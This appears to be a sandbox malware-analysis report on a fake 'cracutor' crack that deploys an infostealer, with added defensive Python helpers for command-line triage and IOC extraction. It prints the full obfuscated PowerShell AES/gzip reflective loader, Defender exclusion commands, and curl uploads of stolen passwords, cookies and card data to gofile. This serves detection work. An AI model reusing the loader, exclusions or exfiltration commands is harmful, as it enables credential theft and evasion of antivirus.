PID 1884 wrote to memory of 1704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 4648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 4648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 4056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 4056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 2172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 2172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 3792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe
PID 1884 wrote to memory of 3792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe
PID 3792 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe
PID 3792 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe
PID 1908 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 3672 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3672 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1908 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 4608 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4608 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 4284 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4284 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 3628 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3628 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 4352 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4352 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 2364 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2364 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1908 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe C:\Windows\system32\cmd.exe
PID 4464 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4464 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2536 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2536 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zFCOPqZUpxhO5ciHbZM4ROMYeYlSpVgI4g7jD8zHAUY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vDZO0S7Am6YBYCRTxFXCyQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zAiLC=New-Object System.IO.MemoryStream(,$param_var); $YmoSv=New-Object System.IO.MemoryStream; $vqshj=New-Object System.IO.Compression.GZipStream($zAiLC, [IO.Compression.CompressionMode]::Decompress); $vqshj.CopyTo($YmoSv); $vqshj.Dispose(); $zAiLC.Dispose(); $YmoSv.Dispose(); $YmoSv.ToArray();}function execute_function($param_var,$param2_var){ $qmwRL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dQiwA=$qmwRL.EntryPoint; $dQiwA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat';$kqgmW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat').Split([Environment]::NewLine);foreach ($RIPei in $kqgmW) { if ($RIPei.StartsWith(':: ')) { $flwkS=$RIPei.Substring(3); break; }}$payloads_var=[string[]]$flwkS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'

C:\Users\Admin\AppData\Local\Temp\klxcnl.exe

"C:\Users\Admin\AppData\Local\Temp\klxcnl.exe"

C:\Users\Admin\AppData\Local\Temp\klxcnl.exe

"C:\Users\Admin\AppData\Local\Temp\klxcnl.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/ResetBackup.potm" https://store10.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ExpandBackup.pptm" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Desktop/ResetBackup.potm" https://store10.gofile.io/uploadFile

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Documents/ExpandBackup.pptm" https://store10.gofile.io/uploadFile
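
The process list above is the whole chain in miniature: four PowerShell runs that add Defender exclusions (two by path, two by process name), `cmd /c ver` and `cmd /c tasklist` for recon, then a series of `curl -F "file=@…" https://store10.gofile.io/uploadFile` uploads of the staged `cr*.txt` files and two Office documents from the user's Desktop and Documents folders. Two points worth drawing out: a process exclusion for `powershell.exe` means files that PowerShell subsequently reads or writes are skipped by real-time protection, not just the binary itself, and `curl.exe` is shipped in System32 on current Windows 10 and 11 builds, so no tooling has to be dropped for the exfiltration step. The helper below is an added example, not part of the sandbox report: it scans process-creation command lines (Sysmon event 1, EDR telemetry, or the list above) for exactly these three behaviours. The sample input is copied from this report's Processes list with one benign line added; the list of upload hosts is an assumption to extend for your environment.

```python
"""Added triage helper: flag Add-MpPreference exclusions, curl multipart
uploads and cmd /c recon commands in process-creation command lines."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample: five command lines copied from the report's Processes
# list plus one benign line so the filter has something to ignore.
SAMPLE_CMDLINES = r'''
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"
curl -F "file=@C:\Users\Admin/Desktop/ResetBackup.potm" https://store10.gofile.io/uploadFile
C:\Windows\system32\notepad.exe C:\Users\Admin\Documents\notes.txt
'''.strip().splitlines()

# Hosts this report shows receiving uploads or POSTs (assumption: extend it).
FILE_SHARING_HOSTS = ("gofile.io", "discord.com")
DISCOVERY_CMDS = {"ver", "tasklist", "whoami", "systeminfo", "hostname"}

EXCLUSION_RE = re.compile(
    r'''Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+(['"]?)(.+?)\2(?:\s|$)''',
    re.IGNORECASE)
# curl -F "file=@<path>" <url>   (quotes optional, --form accepted)
UPLOAD_RE = re.compile(
    r'''\bcurl(?:\.exe)?\b.*?(?:-F|--form)\s+("?)file=@(.+?)\1\s+(https?://[^\s"]+)''',
    re.IGNORECASE)
CMD_WRAPPER_RE = re.compile(r'''cmd(?:\.exe)?\s+/c\s+"?(.*?)"?\s*$''', re.IGNORECASE)


@dataclass
class Finding:
    kind: str      # "defender_exclusion" | "exfil_upload" | "discovery"
    cmdline: str
    detail: dict


def _host_matches(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def parse_defender_exclusion(cmdline):
    """Return the exclusion type and the raw target argument, or None."""
    m = EXCLUSION_RE.search(cmdline)
    if not m:
        return None
    return {"exclusion_type": m.group(1).lower(), "target": m.group(3)}


def parse_multipart_upload(cmdline):
    """Return path, URL and host of a `curl -F file=@... <url>` upload, or None."""
    m = UPLOAD_RE.search(cmdline)
    if not m:
        return None
    path, url = m.group(2), m.group(3)
    host = (urlsplit(url).hostname or "").lower()
    return {"path": path, "url": url, "host": host,
            "file_sharing_host": _host_matches(host, FILE_SHARING_HOSTS)}


def unwrap_cmd(cmdline):
    """Strip a `cmd.exe /c "..."` wrapper so the inner command can be inspected."""
    m = CMD_WRAPPER_RE.search(cmdline)
    return m.group(1) if m else cmdline


def parse_discovery(cmdline):
    """Recognise the short recon commands the sample runs through cmd /c."""
    inner = unwrap_cmd(cmdline).strip()
    first = inner.split(None, 1)[0].lower() if inner else ""
    return {"command": first} if first in DISCOVERY_CMDS else None


def triage(cmdlines):
    """Classify each command line by the first parser that matches it."""
    findings = []
    for line in cmdlines:
        for kind, parser in (("defender_exclusion", parse_defender_exclusion),
                             ("exfil_upload", parse_multipart_upload),
                             ("discovery", parse_discovery)):
            detail = parser(line)
            if detail:
                findings.append(Finding(kind, line, detail))
                break
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f"{f.kind:19} {f.detail}")
```

On a live host the same exclusions are visible with `Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess`, and every change to them is logged as event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log; an exclusion whose target is a scripting host or a path under a user's Temp directory deserves the same response as the upload itself.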

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 scriptblox.com udp
US 172.67.68.166:443 scriptblox.com tcp
US 8.8.8.8:53 166.68.67.172.in-addr.arpa udp
US 8.8.8.8:53 publisher-misc.gl.at.ply.gg udp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 8.8.8.8:53 17.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.38.43.18:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 252.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
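
Most of the table above is resolver chatter: PTR lookups to 8.8.8.8 and the Bing traffic the sandbox image generates on its own. What remains is the sample's real footprint: repeated TCP sessions to `publisher-misc.gl.at.ply.gg` on port 58207 (the `*.at.ply.gg` hostnames belong to the playit.gg tunnelling service, which maps a public host:port onto a port on the operator's machine, so the 147.185.221.17 address is the tunnel endpoint, not the operator), `api.ipify.org` and `geolocation-db.com` for the victim's public IP and location, `api.gofile.io` and `store10.gofile.io` for the uploads shown in the process list, and many TLS sessions to `discord.com` whose purpose the capture cannot show. The script below is an added example, not part of the report: it turns rows in this table's format into a deduplicated, categorised and defanged IOC list. The rows are a subset copied from the table above; the category labels and the noise allowlist are this example's assumptions.

```python
"""Added helper: reduce a sandbox network table to a categorised IOC list."""
from collections import Counter
from dataclasses import dataclass

# Constructed sample: a subset of rows copied from the Network table above.
SAMPLE_ROWS = """
Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 publisher-misc.gl.at.ply.gg udp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 147.185.221.17:58207 publisher-misc.gl.at.ply.gg tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
FR 51.38.43.18:443 api.gofile.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
""".strip().splitlines()

# Category by domain suffix (assumption): ply.gg is the playit.gg tunnel
# service; the others are what this sample used them for in the report.
CATEGORY_BY_SUFFIX = {
    "ply.gg": "tunnel_c2",
    "gofile.io": "file_sharing",
    "discord.com": "discord",
    "ipify.org": "ip_geolocation",
    "geolocation-db.com": "ip_geolocation",
}
# Background traffic of the Windows sandbox image, assumed benign.
NOISE_SUFFIXES = ("bing.com", "bing.net")


@dataclass(frozen=True)
class Flow:
    ip: str
    port: int
    proto: str
    domain: str


@dataclass
class Ioc:
    domain: str
    ip: str
    port: int
    proto: str
    hits: int
    category: str


def _suffix_match(domain, suffixes):
    return any(domain == s or domain.endswith("." + s) for s in suffixes)


def categorize(domain):
    for suffix, category in CATEGORY_BY_SUFFIX.items():
        if _suffix_match(domain, (suffix,)):
            return category
    return "uncategorized"


def parse_row(row):
    """Parse 'Country ip:port domain proto'; return a Flow, or None for noise."""
    parts = row.split()
    if len(parts) != 4 or parts[0] == "Country":
        return None
    _country, dest, domain, proto = parts
    ip, _, port = dest.rpartition(":")
    port, domain = int(port), domain.lower()
    if domain.endswith(".in-addr.arpa") or port == 53:
        return None          # PTR lookups and resolver traffic are not IOCs
    if _suffix_match(domain, NOISE_SUFFIXES):
        return None
    return Flow(ip, port, proto.lower(), domain)


def build_ioc_table(rows):
    """Aggregate repeated flows and sort by how often each was seen."""
    counts = Counter(f for f in map(parse_row, rows) if f)
    iocs = [Ioc(f.domain, f.ip, f.port, f.proto, n, categorize(f.domain))
            for f, n in counts.items()]
    return sorted(iocs, key=lambda i: (-i.hits, i.domain))


def defang(indicator):
    """Neutralise a URL, host or IP so it cannot be clicked or auto-linked."""
    scheme, sep, rest = indicator.partition("://")
    if sep:
        host, slash, path = rest.partition("/")
        return scheme.replace("http", "hxxp") + sep + host.replace(".", "[.]") + slash + path
    return indicator.replace(".", "[.]")


if __name__ == "__main__":
    for i in build_ioc_table(SAMPLE_ROWS):
        print(f"{i.category:15} {i.hits:3}x {defang(i.domain)} -> {defang(i.ip)}:{i.port}/{i.proto}")
```

Blocking the tunnel IP alone is weak: playit.gg hands out the public address, so the operator can re-provision. The durable indicators are the `*.at.ply.gg` hostname pattern and the high non-standard port, plus the pairing of an IP-geolocation lookup with a file-sharing upload from the same host within seconds.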

Files

memory/1884-0-0x00007FFE302C3000-0x00007FFE302C5000-memory.dmp

memory/1884-1-0x00000171AF710000-0x00000171AF732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mk0v5gc0.q5a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1884-11-0x00007FFE302C0000-0x00007FFE30D81000-memory.dmp

memory/1884-12-0x00007FFE302C0000-0x00007FFE30D81000-memory.dmp

memory/1884-13-0x00000171AF900000-0x00000171AF908000-memory.dmp

memory/1884-14-0x00000171D1E50000-0x00000171D2058000-memory.dmp

memory/1884-17-0x00000171AF910000-0x00000171AF924000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

MD5 03d0c69e31fd77718e661722361c0a5c
SHA1 04e02539771963a628477f6546be48d2d912a612
SHA256 255834540df95d84167a197acc6e70d9b80baa5dc15ddb16060508be498f1e78
SHA512 94ed7ee2ad72a4b80fc9121483c5b95ad2a1036b3a20f60499d59cc1255635bcade467952b828a3b27415ddd799c8b3a89476bc0f34726292f6632249fa0d986

memory/2576-28-0x00000000750EE000-0x00000000750EF000-memory.dmp

memory/2576-29-0x00000000007B0000-0x00000000009AE000-memory.dmp

memory/2576-30-0x00000000750E0000-0x0000000075890000-memory.dmp

memory/2576-31-0x0000000005A70000-0x0000000006014000-memory.dmp

memory/2576-32-0x0000000005560000-0x00000000055FE000-memory.dmp

memory/2576-33-0x0000000006020000-0x00000000060B2000-memory.dmp

memory/2576-34-0x00000000750E0000-0x0000000075890000-memory.dmp

memory/2576-35-0x00000000059B0000-0x00000000059B8000-memory.dmp

memory/2576-36-0x0000000005A00000-0x0000000005A38000-memory.dmp

memory/2576-37-0x00000000059D0000-0x00000000059DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 62623d22bd9e037191765d5083ce16a3
SHA1 4a07da6872672f715a4780513d95ed8ddeefd259
SHA256 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA512 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e3161f4edbc9b963debe22e29658050b
SHA1 45dbf88dadafe5dd1cfee1e987c8a219d3208cdb
SHA256 1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a
SHA512 006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 83685d101174171875b4a603a6c2a35c
SHA1 37be24f7c4525e17fa18dbd004186be3a9209017
SHA256 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

memory/1884-90-0x00007FFE302C3000-0x00007FFE302C5000-memory.dmp

memory/1884-91-0x00007FFE302C0000-0x00007FFE30D81000-memory.dmp

memory/1884-92-0x00007FFE302C0000-0x00007FFE30D81000-memory.dmp

memory/2576-93-0x00000000750EE000-0x00000000750EF000-memory.dmp

memory/2576-94-0x00000000750E0000-0x0000000075890000-memory.dmp

memory/1884-95-0x00000171AF8C0000-0x00000171AF8CE000-memory.dmp

memory/1884-97-0x00000171DA5A0000-0x00000171DA6C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\klxcnl.exe

MD5 5076e1777bdc18710ed70c27b96a95db
SHA1 cb24ad63bd9598bccf46e64b576144b2e5be7d53
SHA256 73d2131cdc04f4751f9c6911607a76192bd5e440ec597291cba1acb1aba8f201
SHA512 8d931a5dc1e4cfd7e0876e6f35ba8a2756a44957f746b3c996d6753f089ef127557e483ff434aa2861ae12071a4a68c3eafcacd5930e5f1234fb91831cc67de9

C:\Users\Admin\AppData\Local\Temp\_MEI37922\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
